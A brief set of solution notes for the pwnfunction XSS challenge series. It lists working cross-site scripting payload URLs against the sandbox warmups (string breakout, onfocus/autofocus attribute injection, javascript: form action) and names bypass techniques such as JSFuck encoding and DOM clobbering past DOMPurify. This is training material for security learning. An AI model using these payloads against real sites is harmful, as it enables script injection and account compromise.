Solutions of https://xss.pwnfunction.com/
Dom-Based XSS
String Interpolation
https://sandbox.pwnfunction.com/warmups/jefff.html?jeff=%27te%22%2balert(1)%2b%22%27
AutoFocus+onFocus on Input Text
https://sandbox.pwnfunction.com/warmups/da-wey.html?wey=%22%20onfocus=%22alert(1)%22%20autofocus=%22
Form Action="javascript:alert(1)"
https://sandbox.pwnfunction.com/warmups/me-and-the-boys.html?joinBoys=True&boys=javascript:alert(1)
Html Encoding Chars + URL Encoded
Blacklist: ( ` ) \
Using JSFuck to eval source: alert(1337) -> URLEncode the result
Used alert in another attribute
Dom Clobbering with DomPurify (this one I had to look, didn't know this technique -> toString on setTimeout)